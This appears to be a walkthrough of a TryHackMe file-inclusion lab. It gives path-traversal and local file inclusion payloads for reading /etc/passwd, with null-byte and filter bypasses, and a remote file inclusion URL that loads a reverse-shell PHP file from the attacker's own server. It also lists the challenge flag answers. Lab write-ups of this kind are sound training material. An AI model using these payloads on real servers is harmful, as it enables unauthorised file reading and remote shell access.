File Inclusion
February 25, 2024
Task 1: Introduction
Task 2: Deploy the VM
Task 3: Path Traversal
Task 4: Local File Inclusion - LFI
First Task
First you have to test the input bar too see the result like it's intended. As you can see we have a php file name welcome.php. Let's see the file
Now we can execute some local file inclusion (LFI) which we can access the /etc/passwd in their linux server through the include function of php
OR you can use the dot-dot-slash attack
Second Task
First we have to test a error message, we will try to access a not existing file which is "welcomeee.php" then we can see the directory being specified in the include function
include(includes/welcomeee.php)
The include is the function and the includes is the directory that contains the files php
Task 5: Local File Inclusion - LFI #2
First Task
Now for the Lab #3 there is actually a filter in the include function that adds a .php extension in the files that we are searching. As you can see when we try to access the /etc/passwd, it adds a .php extension at the end
To bypass this filter we just have to add a null byte character %00 or 0x00 in hex
NOTE: the %00 trick is fixed and not working with PHP 5.3.4 and above.
Second Task
For the Lab #4, when we try to access the /etc/passwd file using the URL it says that we are not allowed to view the source file
The function of lab #4 in the php is file_get_content
Basically it says that the include function will read the file in the current directory
For example the double dot slash like (../../../../etc/passwd/..) will move one directory up closer to the root directory.
But the (../../../../etc/passwd/.) with just one dot only will stay in the current directory and read the specified file which is the passwd in the /etc directory.
When we try to access the passwd through (../../../../etc/passwd/.) it actually worked since just i said above it stays on the current directory which is the /etc and the include function in the php will read the passwd file.
Third Task
For the Lab #5, we can see the admin added a filter in the include function when we try to access the /etc/passwd it returns a error.
Payload -> ../../../../etc/passwd
Then when we try to change our payload to the website we will add a additional set of dot-dot-slash ../
Why will this work? This works because the PHP filter only matches and replaces the first subset string ../ it finds and doesn't do another pass, leaving what is pictured below.
Payload -> ....//....//....//....//etc/passwd
Fourth Task
First we have to try the test file provided by the website. The example shows in the input bar is THM-profile/tryhackme.txt which THM-profile is the directory and tryhackme.txt is the file that is being accessed in that directory.
The URL shows like this
/lab6.php?file=THM-profile%2Ftryhackme.txt
Then we just have to modify our payload, we have to include the directory first since it is only allowing the files located in the THM-profile directory
If we include the THM-profile in the first part of our payload as you can see below and add the dot-dot-slash attack we can view the os-release file in the /etc directory
/lab6.php?file=THM-profile/../../../../etc/os-release
Here's the final answer for this task
Task 6: Remote FIle Inclusion - RFI
First we have to make a txt file that have php tag echo in the content and open our own python server so that it can be accessible anywhere
Then we just have to input our ip address and the name of our file that was created
/playground.php?file=http://10.9.193.229:8000/try.txt
ORRRRRR
We could gain a reverse shell to the web server through uploading a reverse shell php file
Just navigate to the reverse shell file that we provided in our own python server then you will get the shell as www-data
/playground.php?file=http://10.9.193.229:8000/php-reverse-shell.php
Task 7: Remediation
Task 8: Challenge
First Task
Just go to inspect elements then change the method from GET to POST
After that you just have to input the payload
../../../../etc/flag1
Second Task
../../../../etc/flag2%00
Third Task
First you have to change the method from GET to POST
Then just put a null byte to the payload in the end so that it will remove the auto .php extension from the filter
../../../../etc/flag3%00
Fourth Task
We already know how to get RCE from the Task 6
Last updated